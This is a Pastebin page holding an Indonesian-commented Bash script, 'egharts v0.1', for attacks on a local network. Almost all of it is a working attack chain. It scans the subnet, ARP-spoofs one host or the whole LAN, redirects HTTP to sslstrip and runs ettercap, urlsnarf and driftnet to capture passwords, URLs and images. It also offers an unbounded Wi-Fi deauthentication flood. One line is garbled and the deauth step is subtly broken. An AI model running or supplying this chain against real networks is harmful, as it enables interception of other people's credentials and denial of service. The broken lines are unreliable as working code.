Advertisement
zee_eichel

egharts v0,1

Apr 3rd, 2011
1,890
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 5.50 KB | None | 0 0
  1. #!/bin/bash
  2.  
  3. # Script egharts.sh
  4. # Script ini menggunakan  Nmap,Arpspoof, SSLStrip, Ettercap, Urlsnarf ,Driftnet
  5. # Script ini ane dedikasikan untuk egha yang selalu berada di samping zee disaat kesusahan
  6. # Tested on BT4 R2
  7. # BY zee eichel.
  8. # Ver 0.1
  9.  
  10. #variable intro
  11. luv1="[\e[01;38mw\e[00m]"
  12. luv2="[\e[01;32mx\e[00m]"
  13. luv3="[\e[01;34mi\e[00m]"
  14. luv4="[\e[01;30m?\e[00m]"
  15.  
  16. #variable ip
  17. gwBgt1="`ip route list | grep "default" | cut -d " " -s -f 5`"
  18. gwBgt2="`ip addr show dev $gwBgt1 | awk '/ether/{ print $2 }'`"
  19. gwBgt3="`ip route list | grep "default" | cut -d" " -f3`"
  20. gwBgt4="`arping -I $gwBgt1 -f $gwBgt3| grep "Unicast" | cut -d" " -f5 | cut -d"[" -f2 | cut -d"]" -f1`"
  21. gwBgt5="`ifconfig  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`" > /dev/null
  22.  
  23. # Intro gw .. jgn di apus please ... :P
  24. echo -e "$luv3 |============================v.0.1==============================|"
  25. echo -e "$luv3 |                                                               |"
  26. echo -e "$luv3 |                    Egharts V0,1 Beta                          |"
  27. echo -e "$luv3 |                   Created By Zee Eichel                       |"
  28. echo -e "$luv3 |                    Dedicated T Egha                           |"
  29. echo -e "$luv3 |                                                               |"
  30. echo -e "$luv3 | Home : www[dot]id-backtrack[dot]com                           |"
  31. echo -e "$luv3 | Email Me : zee_eichel@ymail.com                               |"
  32. echo -e "$luv3 |                                                               |"
  33. echo -e "$luv3 | Tested on BT4 R2                                              |"
  34. echo -e "$luv3 |                                                               |"
  35. echo -e "$luv3 |============================0000===============================|"
  36. echo -e "$luv3 |                                                               |"
  37. echo -e "$luv3 |Tools ini merupakan tools autosniff password https ditambah    |"
  38. echo -e "$luv3 |dengan deauth attack                                           |"
  39. echo -e "$luv3 |                                                               |"
  40. echo -e "$luv3 |Thx To All Staff on tecon-crew.org & indonesianhacker.or.id    |"
  41. echo -e "$luv3 |Greats for all staff and member at indonesian backtrack team   |"
  42. echo -e "$luv3 |                                                               |"
  43. echo -e "$luv3 |Long live linux and fuck wi**o*s                               |"
  44. echo -e "$luv3 |                                                               |"
  45. echo -e "$luv3 |My Best Friend At This World ...                               |"
  46. echo -e "$luv3 |                                                               |"
  47. echo -e "$luv3 |jimmyromanticdevil, cassaprodigy, aip_zenzacky, jurank_dankkal,|"
  48. echo -e "$luv3 |shadowsmaker, angga, phoni3x, _a17z_, devilnay, andre_corleone,|"
  49. echo -e "$luv3 |guitarisnoise, ne0d4rkfl00der, bobyhikaru, mr.fribo, josh_ali  |"
  50. echo -e "$luv3 |                                                               |"
  51. echo -e "$luv3 |==========================USAGE================================|"
  52. echo -e "$luv3 |                                                               |"
  53. echo -e "$luv3 |Ketik [get] untuk menyerang 1 target                           |"
  54. echo -e "$luv3 |Tekan [enter] untuk seluruh target                             |"
  55. echo -e "$luv3 |Tekan[destroy] untuk mengirim serangan deauth                  |"
  56. echo -e "$luv3 |===============================================================|"
  57. echo ""
  58. echo -e "$luv3 Info System: IP:$gwBgt5, MAC:$gwBgt4, GW:$gwBgt3, LanCard:$gwBgt1"
  59. echo ""
  60. echo -e "$luv scanning $gwBgt3/24 execute....."
  61. nmap -sP  $gwBgt3/24 | grep "[0-9].[0-9].[0-9].[0-9]"
  62. echo ""
  63. echo ""
  64. echo -e "$luv2 IP Forwarding...............done!"
  65. echo -e "$luv2 Destination port to 80......done!"
  66.  
  67. echo '1' > /proc/sys/net/ipv4/ip_forward
  68.  
  69. iptables --flush
  70. sleep 1
  71.  
  72. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
  73.  
  74.  
  75. # Arpspoof
  76.  
  77. echo -n -e "$luv4 Apakah ente mau nyerang satu kompi atau seluruh network atau pengen ancurin aja sekalian? ";
  78. read racun
  79. if [ "$racun" == "get" ] ; then
  80. echo
  81. echo -e '\E[30;42m'"<==racun disiapkan==>"; tput sgr0
  82. echo '------------------------'
  83. echo -n -e '\E[37;41m'"IP target lo : "; tput sgr0
  84. read gh41
  85. echo -n -e '\E[30;47m'"Gateway target lo: "; tput sgr0
  86. read gh42
  87. echo -n -e '\E[37;44m'" tipe Interface yang lo gunakan:$gwBgt1  "; tput sgr0
  88. xterm -fg green4 -bg grey0 -e 'arpspoof -i '$gwBgt1' -t '$gh41' '$gh42'' &
  89.  
  90. elif [ "$racun" == "destroy" ] ; then
  91. echo
  92. echo -e '\E[30;40m'"<==deauth attack disiapkan==>"; tput sgr0
  93. echo '------------------------'
  94. echo -n -e '\E[33;41m'"Mac address target lo : "; tput sgr0
  95. read gh43echo       "$luv3 |Set Gateway to $gh42..ok |"
  96.  
  97.  
  98. xterm -fg green4 -bg grey0 -e 'aireplay-ng --deauth 10000000000 -a $gh43 -c ff:ff:ff:ff:ff:ff eth0' &
  99.  
  100. else
  101.  
  102. echo
  103. echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
  104. echo '------------------------'
  105. echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
  106. read gh42
  107.  
  108. echo -n -e '\E[37;44m'"Masukin tipe Interface lo:$gwBgt1 "; tput sgr0
  109.  
  110. xterm -fg green4 -bg grey0 -e 'arpspoof -i '$gwBgt1' '$gh42'' &
  111.  
  112. fi
  113.  
  114. # UNTUK SSLSTRIP
  115. xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &
  116.  
  117. # UNTUK ETTERCAP
  118. xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$gwBgt1'' &
  119.  
  120. # UNTUK URLSNARF
  121. xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$gwBgt1' | grep http > urlsnarf_log.txt' &
  122.  
  123. # DRIFTNET
  124. driftnet -p -i $gwBgt1 &
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement